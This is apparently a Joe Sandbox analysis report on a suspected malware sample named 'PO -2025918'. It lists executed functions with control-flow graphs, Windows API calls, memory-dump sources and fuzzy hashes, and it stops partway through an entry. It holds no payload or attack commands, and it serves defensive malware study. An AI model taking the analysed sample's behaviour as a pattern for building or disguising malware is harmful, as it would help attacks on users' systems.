                                                                                                                            execution_graph 38258 7089e68 38259 7089e98 38258->38259 38260 7089f1e 38259->38260 38261 7089f33 38259->38261 38266 70875e8 38260->38266 38262 70875e8 3 API calls 38261->38262 38265 7089f42 38262->38265 38268 70875f3 38266->38268 38267 7089f29 38268->38267 38271 708a878 38268->38271 38278 708a888 38268->38278 38272 708a886 38271->38272 38284 7087624 38272->38284 38275 708a8af 38275->38267 38276 708a8c7 CreateIconFromResourceEx 38277 708a956 38276->38277 38277->38267 38279 7087624 CreateIconFromResourceEx 38278->38279 38280 708a8a2 38279->38280 38281 708a8af 38280->38281 38282 708a8c7 CreateIconFromResourceEx 38280->38282 38281->38267 38283 708a956 38282->38283 38283->38267 38285 708a8d8 CreateIconFromResourceEx 38284->38285 38286 708a8a2 38285->38286 38286->38275 38286->38276 38250 254b1d0 38253 254b2b9 38250->38253 38251 254b1df 38254 254b2d9 38253->38254 38255 254b2fc 38253->38255 38254->38255 38256 254b500 GetModuleHandleW 38254->38256 38255->38251 38257 254b52d 38256->38257 38257->38251 38287 254d560 38288 254d5a6 GetCurrentProcess 38287->38288 38290 254d5f8 GetCurrentThread 38288->38290 38293 254d5f1 38288->38293 38291 254d635 GetCurrentProcess 38290->38291 38292 254d62e 38290->38292 38294 254d66b 38291->38294 38292->38291 38293->38290 38295 254d693 GetCurrentThreadId 38294->38295 38296 254d6c4 38295->38296 38297 2544668 38298 2544672 38297->38298 38300 2544758 38297->38300 38301 254477d 38300->38301 38305 2544859 38301->38305 38309 2544868 38301->38309 38306 254488f 38305->38306 38308 254496c 38306->38308 38313 2544538 38306->38313 38310 254488f 38309->38310 38311 2544538 CreateActCtxA 38310->38311 38312 254496c 38310->38312 38311->38312 38314 2545cf8 CreateActCtxA 38313->38314 38316 2545dbb 38314->38316 38316->38316 38317 254d7a8 DuplicateHandle 38318 254d83e 38317->38318

                                                                                                                            Executed Functions

                                                                                                                            Function 070875E8 Relevance: 6.9, Strings: 5, Instructions: 623COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 517 70875e8-7089f88 520 708a46b-708a4d4 517->520 521 7089f8e-7089f93 517->521 528 708a4db-708a563 520->528 521->520 522 7089f99-7089fb6 521->522 522->528 529 7089fbc-7089fc0 522->529 568 708a56e-708a5ee 528->568 530 7089fcf-7089fd3 529->530 531 7089fc2-7089fcc 529->531 533 7089fe2-7089fe9 530->533 534 7089fd5-7089fdf 530->534 531->530 537 7089fef-708a01f 533->537 538 708a104-708a109 533->538 534->533 547 708a7ee-708a82c 537->547 552 708a025-708a0f8 call 70875f8 * 2 537->552 542 708a10b-708a10f 538->542 543 708a111-708a116 538->543 542->543 544 708a118-708a11c 542->544 545 708a128-708a158 call 7087604 * 3 543->545 544->547 548 708a122-708a125 544->548 545->568 569 708a15e-708a161 545->569 548->545 552->538 577 708a0fa 552->577 585 708a5f5-708a677 568->585 569->568 572 708a167-708a169 569->572 572->568 574 708a16f-708a1a4 572->574 584 708a1aa-708a1b3 574->584 574->585 577->538 587 708a1b9-708a213 call 7087604 * 2 call 7087614 * 2 584->587 588 708a316-708a31a 584->588 591 708a67f-708a701 585->591 630 708a225 587->630 631 708a215-708a21e 587->631 588->591 592 708a320-708a324 588->592 595 708a709-708a736 591->595 592->595 596 708a32a-708a330 592->596 607 708a73d-708a7bd 595->607 600 708a332 596->600 601 708a334-708a369 596->601 605 708a370-708a376 600->605 601->605 606 708a37c-708a384 605->606 605->607 613 708a38b-708a38d 606->613 614 708a386-708a38a 606->614 668 708a7c4-708a7e6 607->668 618 708a3ef-708a3f5 613->618 619 708a38f-708a3b3 613->619 614->613 627 708a414-708a442 618->627 628 708a3f7-708a412 618->628 652 708a3bc-708a3c0 619->652 653 708a3b5-708a3ba 619->653 648 708a44a-708a456 627->648 628->648 637 708a229-708a22b 630->637 631->637 638 708a220-708a223 631->638 643 708a22d 637->643 644 708a232-708a236 637->644 638->637 643->644 650 708a238-708a23f 644->650 651 708a244-708a24a 644->651 667 708a45c-708a468 648->667 648->668 659 708a2e1-708a2e5 650->659 654 708a24c-708a252 651->654 655 708a254-708a259 651->655 652->547 658 708a3c6-708a3c9 652->658 660 708a3cc-708a3dd 653->660 663 708a25f-708a265 654->663 655->663 658->660 665 708a304-708a310 659->665 666 708a2e7-708a301 659->666 702 708a3df call 708a878 660->702 703 708a3df call 708a888 660->703 671 708a26b-708a270 663->671 672 708a267-708a269 663->672 665->587 665->588 666->665 668->547 677 708a272-708a284 671->677 672->677 674 708a3e5-708a3ed 674->648 683 708a28e-708a293 677->683 684 708a286-708a28c 677->684 685 708a299-708a2a0 683->685 684->685 687 708a2a2-708a2a4 685->687 688 708a2a6 685->688 692 708a2ab-708a2b6 687->692 688->692 694 708a2b8-708a2bb 692->694 695 708a2da 692->695 694->659 697 708a2bd-708a2c3 694->697 695->659 698 708a2ca-708a2d3 697->698 699 708a2c5-708a2c8 697->699 698->659 701 708a2d5-708a2d8 698->701 699->695 699->698 701->659 701->695 702->674 703->674
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                            • API String ID: 0-1079488684
                                                                                                                            • Opcode ID: 6cab8b3f31a80398dc7c8accc220fe9ea6899cfc00a560b2a86834139d9ce996
                                                                                                                            • Instruction ID: e02d36bff755a5713dcb9c9e24db010e38e82a77d30768c6b3b19452fa87beae
                                                                                                                            • Opcode Fuzzy Hash: 6cab8b3f31a80398dc7c8accc220fe9ea6899cfc00a560b2a86834139d9ce996
                                                                                                                            • Instruction Fuzzy Hash: 693261B0B002548FDB94EFA8C8547AEBBF2BF84300F14C6AAD449AB395DB349D45CB55
                                                                                                                            Function 0707683F Relevance: .3, Instructions: 310COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7783bb9a83020a2d05b466123b3c71bbc4c049adfa71aa22166ec16d90a04f98
                                                                                                                            • Instruction ID: 54783f24d8616bdab75f9af36d1f497b64a85d9993d34f99df566bf7fe721941
                                                                                                                            • Opcode Fuzzy Hash: 7783bb9a83020a2d05b466123b3c71bbc4c049adfa71aa22166ec16d90a04f98
                                                                                                                            • Instruction Fuzzy Hash: 5ED124B0E04618CFDB54CFA9C8847EEBBF5BF4A300F1492AAD41AA7252DB355985CF05
                                                                                                                            Function 070768B0 Relevance: .3, Instructions: 289COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 91525e591d12be558d7ddd49a543c618975be0c24f2689f7ac3ebe92ae5ed8b4
                                                                                                                            • Instruction ID: 576fe566b4e5987f8fdc0ef661379e2c548ea98da9889336e787b4011209b634
                                                                                                                            • Opcode Fuzzy Hash: 91525e591d12be558d7ddd49a543c618975be0c24f2689f7ac3ebe92ae5ed8b4
                                                                                                                            • Instruction Fuzzy Hash: B5C1F2B0E04619CFDB54CFAAC8847EEBBF5BF4A300F1492A9D41AA7252DB355985CF04
                                                                                                                            Function 07089F50 Relevance: .3, Instructions: 283COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad5a16701c25cd6d597b27506f14a05f223c5fe92e688eeb23c718c9746ad64f
                                                                                                                            • Instruction ID: b21c3e6328c202e7ad48a15d43c9e4d7285faac376a5b4d863efc525c6a3bf54
                                                                                                                            • Opcode Fuzzy Hash: ad5a16701c25cd6d597b27506f14a05f223c5fe92e688eeb23c718c9746ad64f
                                                                                                                            • Instruction Fuzzy Hash: E7C17EB0E002558FCF95DFA8C88079DBBF2AF89310F14C6AAD449AB255EB70D985CF50
                                                                                                                            Function 070875E2 Relevance: .3, Instructions: 281COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96e2f606807b7f3b65da190db7ba037bdef16c0f8d7513d82bca85cbe36697a8
                                                                                                                            • Instruction ID: 3a5b564aec13865618e286b0569785db903a4bb37b5b44160b42093dbdb57bc6
                                                                                                                            • Opcode Fuzzy Hash: 96e2f606807b7f3b65da190db7ba037bdef16c0f8d7513d82bca85cbe36697a8
                                                                                                                            • Instruction Fuzzy Hash: 2EC18EB0E002558FCF95EFA9C88079DBBF2BF85310F14C6AAD449AB255EB709985CF50
                                                                                                                            Function 0707689F Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4f1563964d7a2aa256544dbb463efca7db79d9e53df071764f248be4e36c8fd3
                                                                                                                            • Instruction ID: bb3131235d603f8c3c92ffaf5143ef9d99cfe716cd3c7818e786750336040306
                                                                                                                            • Opcode Fuzzy Hash: 4f1563964d7a2aa256544dbb463efca7db79d9e53df071764f248be4e36c8fd3
                                                                                                                            • Instruction Fuzzy Hash: 94C102B0E04618CFDB54CFAAC8847EEBBF6BF49300F1482AAD41AA7251DB755985CF04
                                                                                                                            Function 07075D40 Relevance: .2, Instructions: 210COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 563c9cd156c9a72e3a8b9e68a47c3ee59a4ca27794605fefadb748129e14075f
                                                                                                                            • Instruction ID: fd023ea4d3817d039e1ef853874d73ad866064287710f2f720b9ce9f9f37755b
                                                                                                                            • Opcode Fuzzy Hash: 563c9cd156c9a72e3a8b9e68a47c3ee59a4ca27794605fefadb748129e14075f
                                                                                                                            • Instruction Fuzzy Hash: 589101B0D05219CFDB24CFA9C8887EDBBB2FF4A304F108169E429A7261DB745995CF44
                                                                                                                            Function 0254D551 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 704 254d551-254d5ef GetCurrentProcess 708 254d5f1-254d5f7 704->708 709 254d5f8-254d62c GetCurrentThread 704->709 708->709 710 254d635-254d669 GetCurrentProcess 709->710 711 254d62e-254d634 709->711 713 254d672-254d68d call 254d72f 710->713 714 254d66b-254d671 710->714 711->710 717 254d693-254d6c2 GetCurrentThreadId 713->717 714->713 718 254d6c4-254d6ca 717->718 719 254d6cb-254d72d 717->719 718->719
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D5DE
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0254D61B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D658
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0254D6B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: 35794af64b34485bb72e93280e58b0f3d82e8670b355a8cf9454c65df4798cc6
                                                                                                                            • Instruction ID: d96a683e114ca3478b74199e5a9371dc884693c379dd18a94394a29cf2cb9971
                                                                                                                            • Opcode Fuzzy Hash: 35794af64b34485bb72e93280e58b0f3d82e8670b355a8cf9454c65df4798cc6
                                                                                                                            • Instruction Fuzzy Hash: 805123B09013498FDB14DFA9D548BDEBBF1FB48318F248499D419A7260DB389984CF69
                                                                                                                            Function 0254D560 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 726 254d560-254d5ef GetCurrentProcess 730 254d5f1-254d5f7 726->730 731 254d5f8-254d62c GetCurrentThread 726->731 730->731 732 254d635-254d669 GetCurrentProcess 731->732 733 254d62e-254d634 731->733 735 254d672-254d68d call 254d72f 732->735 736 254d66b-254d671 732->736 733->732 739 254d693-254d6c2 GetCurrentThreadId 735->739 736->735 740 254d6c4-254d6ca 739->740 741 254d6cb-254d72d 739->741 740->741
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D5DE
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0254D61B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0254D658
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0254D6B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: 0829b6c3ab3eade7fdaab4f43418d42fe76fb9e0b77b2b134e63cf72d8f95a55
                                                                                                                            • Instruction ID: 7f8430817c563e4d3a1fe88a815ffa132422f88c2a4b8c69992dfa6291f6a385
                                                                                                                            • Opcode Fuzzy Hash: 0829b6c3ab3eade7fdaab4f43418d42fe76fb9e0b77b2b134e63cf72d8f95a55
                                                                                                                            • Instruction Fuzzy Hash: 4D5133B09013498FDB14DFA9D548BDEFBF1FB48318F208459E419A7260DB38A984CF69
                                                                                                                            Function 070701F7 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1023 70701f7-70701f9 1024 7070201 1023->1024 1025 70701fb-7070200 1023->1025 1026 7070202-7070206 1024->1026 1027 7070209-7070217 1024->1027 1025->1024 1026->1027 1028 707021f-7070221 1027->1028 1029 7070223-7070238 1028->1029 1030 707023b-7070275 1028->1030 1037 7070277-707027c 1030->1037 1038 707027d-70702a8 1030->1038 1037->1038 1040 7070354-707036b 1038->1040 1041 70702ae-70702b0 1038->1041 1050 7070371 1040->1050 1051 707036d-707036f 1040->1051 1042 70702b6-70702c1 1041->1042 1043 70703de-7070419 1041->1043 1048 70702c3-70702c5 1042->1048 1049 70702de-70702e2 1042->1049 1071 7070421-7070487 1043->1071 1072 707041b-707041f 1043->1072 1052 70702c7-70702ce 1048->1052 1053 70702d0-70702db 1048->1053 1054 70702e4-70702f8 1049->1054 1055 7070341-707034a 1049->1055 1057 7070376-7070378 1050->1057 1051->1057 1052->1049 1053->1049 1063 707030e-7070312 1054->1063 1064 70702fa-707030b 1054->1064 1059 70703ac-70703d7 1057->1059 1060 707037a-70703a5 1057->1060 1059->1043 1060->1059 1067 7070314 1063->1067 1068 707031a-7070333 1063->1068 1064->1063 1067->1068 1075 7070335 1068->1075 1076 707033e 1068->1076 1079 7070490-70704b1 1071->1079 1080 7070489-707048f 1071->1080 1072->1071 1075->1076 1076->1055 1080->1079
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$Hoq
                                                                                                                            • API String ID: 0-3084834809
                                                                                                                            • Opcode ID: d152cdbe8bc3b784dc682da8f8c973a35ab8e41daaba46ff71a439cddaa1867d
                                                                                                                            • Instruction ID: 2c87ac6a65087fa5e3c9428a9c8cc92625a0dac58a980c3bfeaf44e3ee87f1fc
                                                                                                                            • Opcode Fuzzy Hash: d152cdbe8bc3b784dc682da8f8c973a35ab8e41daaba46ff71a439cddaa1867d
                                                                                                                            • Instruction Fuzzy Hash: CC71D4B5B002149FDB54EF69C5447EEBBF6EB88310F148669D405E7380DB349D42CBA9
                                                                                                                            Function 070707C0 Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq
                                                                                                                            • API String ID: 0-3175707579
                                                                                                                            • Opcode ID: e98492f55d31742c82b85c7a686601d85d551ef03e0676a4d00a920729178459
                                                                                                                            • Instruction ID: 4f1b6e082e2c0d6f00125d4b92d2f21b663a10e3d03d4f1f6e35c6cfe5b06ebe
                                                                                                                            • Opcode Fuzzy Hash: e98492f55d31742c82b85c7a686601d85d551ef03e0676a4d00a920729178459
                                                                                                                            • Instruction Fuzzy Hash: 20F104B0F05206DFCB56AF74C4546AEBFF1EF85300F1586AAD082A72A5DB30D861CB95
                                                                                                                            Function 0254B2B9 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0254B51E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: af15febf3d9373c47dc39d0f8fa1ec41d0154c2533c1593c137c5b8039d267c4
                                                                                                                            • Instruction ID: c00ba84c1fc1f9dd99ac672562ffe307163ff81266c3d4cf2839f9f4a1e7966d
                                                                                                                            • Opcode Fuzzy Hash: af15febf3d9373c47dc39d0f8fa1ec41d0154c2533c1593c137c5b8039d267c4
                                                                                                                            • Instruction Fuzzy Hash: 1D812470A00B058FD724CF6AD15079ABBF1FF88308F148A6DD48AD7A50EB75E945CB94
                                                                                                                            Function 0707E480 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'kq
                                                                                                                            • API String ID: 0-3255046985
                                                                                                                            • Opcode ID: db6dc4851915e9cc3addc2c5711c727d40d1365dc275ea8df847d055efe782d1
                                                                                                                            • Instruction ID: 628a7234d50f2dba59bedb26e57883e9224fc86a00295daf97e3cba8fef5cad7
                                                                                                                            • Opcode Fuzzy Hash: db6dc4851915e9cc3addc2c5711c727d40d1365dc275ea8df847d055efe782d1
                                                                                                                            • Instruction Fuzzy Hash: 91E15E74E00309DFDB09EFA8C944AAEBBF6FB88300F148594D405A7368CB79AD85DB55
                                                                                                                            Function 02544538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02545DA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 8f3bc573ecd330fe1a6a8aa2792ed9f340b8120ce3a96b9577d093770448e082
                                                                                                                            • Instruction ID: 326911d1ef5bd02ea891190a07da89f8cf806f7f1edcf5350e6cded755a5c102
                                                                                                                            • Opcode Fuzzy Hash: 8f3bc573ecd330fe1a6a8aa2792ed9f340b8120ce3a96b9577d093770448e082
                                                                                                                            • Instruction Fuzzy Hash: 3A41F4B0C00619CFDB24DF99C84478EFBF5BF44308F6080A9D408AB255DB756985CF94
                                                                                                                            Function 02545CEC Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02545DA9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 0e7e743865605dc045eb6770382391bb9079b6d44a122b6ddf8484043b3e600c
                                                                                                                            • Instruction ID: d640faa754da8f72fb6871c51fc083fa0f50c1ab06e7a5f111dc5934beaec278
                                                                                                                            • Opcode Fuzzy Hash: 0e7e743865605dc045eb6770382391bb9079b6d44a122b6ddf8484043b3e600c
                                                                                                                            • Instruction Fuzzy Hash: F441D4B0C00619CFDB24DFA9C98479DFBF6BF48304F6480AAD408AB255DB756985CF94
                                                                                                                            Function 0708A888 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3668623891-0
                                                                                                                            • Opcode ID: 054c397cef51dede50edaffa26c275b7c935701a83d585bfd23f5dc821ed30c2
                                                                                                                            • Instruction ID: ae7e90b1805acb5d8eb14b3a5c65e814fc0af8003baf18f91fe9b157111dac14
                                                                                                                            • Opcode Fuzzy Hash: 054c397cef51dede50edaffa26c275b7c935701a83d585bfd23f5dc821ed30c2
                                                                                                                            • Instruction Fuzzy Hash: C431C0B2904399DFCB11DFA9D840ADEBFF4EF09320F14845AE594AB261C3359854DFA1
                                                                                                                            Function 0254D7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254D82F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 29ee2458d7f5a2850c1c3c9b02cde8abc485de62a825b64817466ab01b6475b6
                                                                                                                            • Instruction ID: 886814a9cdf3e905aa99e5db452b214cb83ec230bd74a9e6cccd9c5a95b8df77
                                                                                                                            • Opcode Fuzzy Hash: 29ee2458d7f5a2850c1c3c9b02cde8abc485de62a825b64817466ab01b6475b6
                                                                                                                            • Instruction Fuzzy Hash: 6021E4B59002489FDB10CF9AD584AEEFFF4FB48324F14801AE918A7310D375A940CFA4
                                                                                                                            Function 0254D7A0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254D82F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 8ca87e023967796d759f440d92a10c9de6a8d90c0059d7425e7f837506e61da4
                                                                                                                            • Instruction ID: 909db4d3087085fce9fa287df40fc07bab63a8375721c37ff4a5fba9503119ca
                                                                                                                            • Opcode Fuzzy Hash: 8ca87e023967796d759f440d92a10c9de6a8d90c0059d7425e7f837506e61da4
                                                                                                                            • Instruction Fuzzy Hash: 40210EB5900218DFCB10CF99D584AEEBBF5FB48320F14802AE918A7220C779A944CF64
                                                                                                                            Function 07087624 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0708A8A2,?,?,?,?,?), ref: 0708A947
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892748708.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7080000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3668623891-0
                                                                                                                            • Opcode ID: 29b0447a04440f550687122c12c1e6fcd13526f2ddd33b142c9ccd6d83a61b2d
                                                                                                                            • Instruction ID: c168a3c574f4a8691476ed6405109ab4419274d19170ec63f7f7ddd4d7ce05da
                                                                                                                            • Opcode Fuzzy Hash: 29b0447a04440f550687122c12c1e6fcd13526f2ddd33b142c9ccd6d83a61b2d
                                                                                                                            • Instruction Fuzzy Hash: 301179B1900349DFDB10DF9AD844BEEBFF8EB48320F14841AE554A7250C375A950DFA4
                                                                                                                            Function 0254B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0254B51E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
